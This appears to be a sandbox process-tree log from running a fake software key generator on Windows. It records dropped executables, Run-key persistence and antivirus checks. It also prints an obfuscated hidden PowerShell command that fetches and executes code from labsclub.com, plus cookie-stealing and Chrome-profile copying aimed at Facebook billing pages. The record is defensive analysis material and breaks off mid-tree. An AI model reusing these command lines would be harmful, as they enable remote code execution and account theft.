C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7264 /prefetch:82⤵PID:4248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7524 /prefetch:12⤵PID:4696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7136 /prefetch:82⤵PID:4904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7304 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7484 /prefetch:82⤵PID:5056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7024 /prefetch:82⤵PID:388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:82⤵PID:4020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7356 /prefetch:82⤵PID:4684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6724 /prefetch:82⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5480 /prefetch:82⤵PID:5020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7488 /prefetch:82⤵PID:4504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:12⤵PID:4840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5432 /prefetch:82⤵PID:4456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6300 /prefetch:82⤵PID:1968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5996 /prefetch:82⤵PID:4452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:82⤵PID:2164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:12⤵PID:4940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6752 /prefetch:82⤵PID:4924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7844 /prefetch:82⤵PID:1940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7948 /prefetch:82⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8104 /prefetch:82⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3988 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4304 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3428 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1652 /prefetch:82⤵PID:4900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:82⤵PID:4452
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1088
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:856
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:348
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:388
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4540
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"1⤵PID:4892
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3924 -
C:\Users\Admin\AppData\Roaming\6477.tmp.exe"C:\Users\Admin\AppData\Roaming\6477.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4852 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\6477.tmp.exe"5⤵PID:7044
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:6032
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵PID:4536
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:4276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:4140 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:4704
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\IURXHCO9HY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IURXHCO9HY\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\IURXHCO9HY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IURXHCO9HY\multitimer.exe" 1 3.1617987558.607087e6a8961 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\IURXHCO9HY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IURXHCO9HY\multitimer.exe" 2 3.1617987558.607087e6a89617⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:4604 -
C:\Users\Admin\AppData\Local\Temp\xmarej0z3oh\z3t0iohdxck.exe"C:\Users\Admin\AppData\Local\Temp\xmarej0z3oh\z3t0iohdxck.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\is-P1LHO.tmp\z3t0iohdxck.tmp"C:\Users\Admin\AppData\Local\Temp\is-P1LHO.tmp\z3t0iohdxck.tmp" /SL5="$203B6,140785,56832,C:\Users\Admin\AppData\Local\Temp\xmarej0z3oh\z3t0iohdxck.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\is-AKUU6.tmp\apipostback.exe"C:\Users\Admin\AppData\Local\Temp\is-AKUU6.tmp\apipostback.exe" adan adan10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6096 -
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\nRAoFSbJu.dll"11⤵PID:5400
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\nRAoFSbJu.dll"12⤵
- Loads dropped DLL
PID:6832 -
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\nRAoFSbJu.dll"13⤵PID:6384
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\nRAoFSbJu.dlla3N4K2Bf5.dll"11⤵PID:7456
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\nRAoFSbJu.dlla3N4K2Bf5.dll"12⤵PID:5068
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:6616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:6112
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\detcp2xhbnm\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\detcp2xhbnm\KiffApp1.exe"8⤵PID:5740
-
-
C:\Users\Admin\AppData\Local\Temp\w44w02gyebb\0gqddtx1szs.exe"C:\Users\Admin\AppData\Local\Temp\w44w02gyebb\0gqddtx1szs.exe" /ustwo INSTALL8⤵PID:5772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "0gqddtx1szs.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\w44w02gyebb\0gqddtx1szs.exe" & exit9⤵PID:7408
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "0gqddtx1szs.exe" /f10⤵
- Kills process with taskkill
PID:7708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jmryn5lurhe\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\jmryn5lurhe\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
PID:5764 -
C:\Users\Admin\AppData\Local\Temp\is-7ARDJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-7ARDJ.tmp\Setup3310.tmp" /SL5="$703CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\jmryn5lurhe\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5840 -
C:\Users\Admin\AppData\Local\Temp\is-7DTDT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7DTDT.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6644 -
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6812 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:6244
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:8100
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"11⤵PID:6820
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit13⤵PID:7984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f14⤵
- Kills process with taskkill
PID:7544
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 614⤵
- Delays execution with timeout.exe
PID:7972
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
PID:6884 -
C:\Users\Admin\AppData\Local\Temp\is-UUV6A.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-UUV6A.tmp\LabPicV3.tmp" /SL5="$105C4,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7056 -
C:\Users\Admin\AppData\Local\Temp\is-69HOD.tmp\alpATCHInO.exe"C:\Users\Admin\AppData\Local\Temp\is-69HOD.tmp\alpATCHInO.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:6776 -
C:\Program Files\Google\QXHLLUMRTT\prolab.exe"C:\Program Files\Google\QXHLLUMRTT\prolab.exe" /VERYSILENT14⤵
- Executes dropped EXE
PID:7520 -
C:\Users\Admin\AppData\Local\Temp\is-ALO42.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-ALO42.tmp\prolab.tmp" /SL5="$30640,575243,216576,C:\Program Files\Google\QXHLLUMRTT\prolab.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:7656
-
-
-
C:\Users\Admin\AppData\Local\Temp\ea-771d3-354-f97ab-bca638f7c4645\Libaexazhipi.exe"C:\Users\Admin\AppData\Local\Temp\ea-771d3-354-f97ab-bca638f7c4645\Libaexazhipi.exe"14⤵
- Executes dropped EXE
PID:5716
-
-
C:\Users\Admin\AppData\Local\Temp\42-8f870-829-e51ac-a80ec56ee75fe\Waevefezhyvy.exe"C:\Users\Admin\AppData\Local\Temp\42-8f870-829-e51ac-a80ec56ee75fe\Waevefezhyvy.exe"14⤵
- Executes dropped EXE
PID:420 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k1fe5mby.d44\gaooo.exe & exit15⤵PID:6420
-
C:\Users\Admin\AppData\Local\Temp\k1fe5mby.d44\gaooo.exeC:\Users\Admin\AppData\Local\Temp\k1fe5mby.d44\gaooo.exe16⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵
- Executes dropped EXE
PID:5884
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:4288
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rk21aiou.pgi\google-game.exe & exit15⤵PID:7640
-
C:\Users\Admin\AppData\Local\Temp\rk21aiou.pgi\google-game.exeC:\Users\Admin\AppData\Local\Temp\rk21aiou.pgi\google-game.exe16⤵PID:6892
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install17⤵PID:7312
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\unhlnfm3.1rq\jg8_8qyu.exe & exit15⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\unhlnfm3.1rq\jg8_8qyu.exeC:\Users\Admin\AppData\Local\Temp\unhlnfm3.1rq\jg8_8qyu.exe16⤵PID:4636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qeiedfni.1q2\wwfvd.exe & exit15⤵PID:5056
-
C:\Users\Admin\AppData\Local\Temp\qeiedfni.1q2\wwfvd.exeC:\Users\Admin\AppData\Local\Temp\qeiedfni.1q2\wwfvd.exe16⤵PID:8128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\qeiedfni.1q2\wwfvd.exe" & del C:\ProgramData\*.dll & exit17⤵PID:6844
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wwfvd.exe /f18⤵
- Kills process with taskkill
PID:3340
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:4492
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yx1hcose.ij2\askinstall31.exe & exit15⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\yx1hcose.ij2\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\yx1hcose.ij2\askinstall31.exe16⤵PID:4992
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:640
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:5236
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y17⤵PID:6536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/17⤵PID:6856
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc409d6e00,0x7ffc409d6e10,0x7ffc409d6e2018⤵PID:668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,7876814297493765110,11598390822921555987,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1672 /prefetch:818⤵PID:7820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,7876814297493765110,11598390822921555987,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:218⤵
- Executes dropped EXE
PID:5740
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z04yixhz.cum\GcleanerWW.exe /mixone & exit15⤵PID:5172
-
-
-
-
-
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"11⤵
- Executes dropped EXE
PID:6876 -
C:\Users\Admin\AppData\Local\Temp\ASEU36ETHC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ASEU36ETHC\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:6740 -
C:\Users\Admin\AppData\Local\Temp\ASEU36ETHC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ASEU36ETHC\multitimer.exe" 1 3.1617987594.6070880ad35c1 10313⤵
- Executes dropped EXE
- Adds Run key to start application
PID:8108 -
C:\Users\Admin\AppData\Local\Temp\ASEU36ETHC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ASEU36ETHC\multitimer.exe" 2 3.1617987594.6070880ad35c114⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:7328 -
